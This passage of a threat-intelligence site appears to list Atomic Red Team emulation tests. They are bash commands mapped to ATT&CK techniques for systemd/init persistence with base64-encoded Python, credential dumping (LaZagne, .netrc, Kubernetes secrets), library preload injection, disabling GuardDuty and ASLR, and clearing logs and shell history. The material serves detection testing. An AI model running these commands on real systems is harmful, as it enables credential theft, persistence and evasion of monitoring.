echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}
T1543.002 bash elevated linux Create Systemd Service file, Enable the service , Modify and Reload the service.
Systemd Service
This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
echo "#!/bin/bash" > /etc/init.d/T1543.002
echo "### BEGIN INIT INFO" >> /etc/init.d/T1543.002
echo "# Provides : Atomic Test T1543.002" >> /etc/init.d/T1543.002
echo "# Required-Start: \$all" >> /etc/init.d/T1543.002
echo "# Required-Stop : " >> /etc/init.d/T1543.002
echo "# Default-Start: 2 3 4 5" >> /etc/init.d/T1543.002
echo "# Default-Stop: " >> /etc/init.d/T1543.002
echo "# Short Description: Atomic Test for Systemd Service Creation" >> /etc/init.d/T1543.002
echo "### END INIT INFO" >> /etc/init.d/T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK')) \" " >> /etc/init.d/T1543.002
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
T1543.004 bash elevated macos Launch Daemon
Launch Daemon
Utilize LaunchDaemon to launch Hello World
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
T1546.004 bash elevated linux Create/Append to .bash_logout
Unix Shell Configuration Modification
The Bash shell runs ~/.bash_logout "if it exists" to run commands on user logout. An adversary may create or append to a .bash_logout to clear history, start processes etc. Note the ~/.bash_logout is only run if you explicitly exit or log out of an "interactive login shell session" i.e. via the console, SSH, /bin/bash -l or su -l <username>. This test creates the art user, logs in, creates a .bash_logout which will echo some text into the art.txt file on logout and logs out and the /home/art/art.txt is created.
useradd --create-home --shell /bin/bash art
su -l art -c "echo 'echo \"Atomic Red Team was here... T1546.004\" >> /home/art/art.txt' >> /home/art/.bash_logout; exit"
T1547.006 bash elevated linux Linux - Load Kernel Module via insmod
Kernel Modules and Extensions
This test uses the insmod command to load a kernel module for Linux.
sudo insmod #{module_path}
T1547.006 bash elevated macos MacOS - Load Kernel Module via kextload and kmutil
Kernel Modules and Extensions
This test uses the kextload and kmutil commands to load and unload a MacOS kernel module.
set -x
sudo kextload #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload #{module_path}
sudo kmutil load -p #{module_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kmutil unload -p #{module_path}
T1547.006 bash elevated macos MacOS - Load Kernel Module via KextManagerLoadKextWithURL()
Kernel Modules and Extensions
This test uses the IOKit API to load a kernel module for macOS. Harcoded to use SoftRAID kext
sudo #{exe_path}
kextstat 2>/dev/null | grep SoftRAID
sudo kextunload /Library/Extensions/SoftRAID.kext
T1547.015 bash macos Add macOS LoginItem using Applescript
Login Items
Runs osascript on a file to create new LoginItem for current user. NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events" Therefore, it can't be automated until the TCC is granted. The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well. In addition to the osascript Process Events, file modification events to /Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm should be seen.
osascript #{scriptfile}
T1552.001 bash elevated macos Extract Browser and System credentials with LaZagne
Credentials In Files
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
python2 laZagne.py all
T1552.001 bash linux, macos Find and Access Github Credentials
Credentials In Files
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.007 bash containers List All Secrets
Container API
A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services or provide further access to the cluster. [More information about secrets](https://kubernetes.io/docs/concepts/configuration/secret/). This test will make a request to the Kubernetes api at the /api/v1/secrets endpoint requesting every secret stored within the cluster.
kubectl get secrets --all-namespaces
T1552.007 bash containers ListSecrets
Container API
A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.
kubectl get secrets -n #{namespace}
T1560.001 bash elevated linux, macos Data Compressed - nix - zip
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
zip #{output_file} #{input_files}
T1560.001 bash linux, macos Encrypts collected data with AES-256 and Base64
Archive via Utility
An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/
zip -r  #{input_folder}/#{input_file}.zip #{input_folder}
openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc 
cat #{input_folder}/#{input_file}.enc | base64
T1568.002 bash linux DGA Simulation (Python)
Domain Generation Algorithms
Simulates Domain Generation Algorithm (DGA) traffic by generating pseudo-random domains based on the current date and querying them using dig. This is designed to trigger DNS analytics and NGIDS.
python3 "#{python_script_path}"
T1569.001 bash macos Launchctl
Launchctl
Utilize launchctl
launchctl submit -l #{label_name} -- #{executable_path}
T1569.002 bash linux psexec.py (Impacket)
Service Execution
Will execute a command on the remote host with Impacket psexec.py script.
psexec.py '#{domain}/#{username}:#{password}@#{remote_host}' '#{command}'
T1572 bash linux, macos Microsoft Dev tunnels (Linux/macOS)
Protocol Tunneling
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc. Reference: - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
#{binary_path} host -p #{port} &
T1574.006 bash elevated linux Shared Library Injection via /etc/ld.so.preload
Dynamic Linker Hijacking
This test adds a shared library to the ld.so.preload list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package. Upon successful execution, bash will echo ../bin/T1574.006.so to /etc/ld.so.preload.
sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'
T1574.006 bash linux Shared Library Injection via LD_PRELOAD
Dynamic Linker Hijacking
This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the glibc package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library /etc/ld.so.preload. Output will be via stdout.
LD_PRELOAD=#{path_to_shared_library} ls
T1574.006 bash macos Dylib Injection via DYLD_INSERT_LIBRARIES
Dynamic Linker Hijacking
injects a dylib that opens calculator via env variable
DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
T1609 bash containers ExecIntoContainer
Container Administration Command
Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”.
kubectl create -f #{path} -n #{namespace}
# wait 3 seconds for the instance to come up
sleep 3
kubectl exec -n #{namespace} busybox -- #{command}
T1609 bash containers Docker Exec Into Container
Container Administration Command
Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts.
docker build -t t1609  $PathtoAtomicsFolder/T1609/src/ 
docker run --name t1609_container --rm -itd t1609 bash /tmp/script.sh
docker exec -i t1609_container bash -c "cat /tmp/output.txt"
T1610 bash containers Deploy Docker container
Deploy Container
Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime. They can do this using docker create and docker start commands. Kinsing & Doki was exploited using this technique.
docker build -t t1610 $PathtoAtomicsFolder/T1610/src/
docker run --name t1610_container --rm -itd t1610 bash /tmp/script.sh
T1614 bash macos, linux Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
System Location Discovery
Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
curl -k #{ip_lookup_url}
T1652 bash linux Device Driver Discovery (Linux)
Device Driver Discovery
Displays a list of loaded kernel modules on a Linux system, which is used to enumerate drivers.
lsmod
T1652 bash linux Enumerate Kernel Driver Files (Linux)
Device Driver Discovery
Finds and lists all kernel driver files on a Linux system in order to provide a broader view of available drivers, not just loaded ones.
find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
T1652 bash macos List loaded kernel extensions (macOS)
Device Driver Discovery
Displays a list of loaded kernel extensions (kexts) on a macOS system.
kextstat
T1652 bash macos Find Kernel Extensions (macOS)
Device Driver Discovery
Searches for kernel extension (kext) files on a macOS system.
kextfind
T1659 bash macos, linux MITM Proxy Injection
Content Injection
Start mitmdump and verify injected header and HTML content.
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
T1685 bash iaas:aws AWS - GuardDuty Suspension or Deletion
Disable or Modify Tools
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
T1685 bash elevated linux Disable ASLR Via sysctl parameters - Linux
Disable or Modify Tools
Detects Execution of the sysctl command to set kernel.randomize_va_space=0 which disables Address Space Layout Randomization (ASLR) in Linux.
sysctl -w kernel.randomize_va_space=0
T1685 bash elevated linux Auditing Configuration Changes on Linux Host
Disable or Modify Tools
Emulates modification of auditd configuration files
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi 
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
T1685 bash elevated linux Logging Configuration Changes on Linux Host
Disable or Modify Tools
Emulates modification of syslog configuration.
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
T1685.006 bash elevated linux Overwrite Linux Mail Spool
Clear Linux or Mac System Logs
This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
echo 0> /var/spool/mail/#{username}
T1685.006 bash elevated linux Overwrite Linux Log
Clear Linux or Mac System Logs
This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
echo 0> #{log_path}
T1690 bash linux Clear bash history
Prevent Command History Logging
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
cp $HISTFILE $HISTFILE.OLD
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
echo "" > $HISTFILE
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
ls -la $HISTFILE 
cat $HISTFILE
history -c 
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
T1690 bash linux Setting the HISTCONTROL environment variable
Prevent Command History Logging
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
TEST=$(echo $HISTCONTROL)
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
history -c 
ls -la $HISTFILE # " ls -la $HISTFILE"
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
history -c 
ls -la $HISTFILE
ls -la $HISTFILE
ls -la $HISTFILE
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
T1690 bash linux Setting the HISTFILESIZE environment variable
Prevent Command History Logging
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
TEST=$(echo $HISTFILESIZE)
echo $HISTFILESIZE
export HISTFILESIZE=0
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT";  fi
T1690 bash linux Setting the HISTFILE environment variable
Prevent Command History Logging
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
TEST=$(echo $HISTFILE)
echo $HISTFILE
export HISTFILE="/dev/null"
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT";  fi
T1690 bash linux Setting the HISTIGNORE environment variable
Prevent Command History Logging
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands. In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c 
ls -la $HISTFILE
ls -la ~/.bash_logout
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
unset HISTIGNORE
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
history -c 
whoami
groups
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin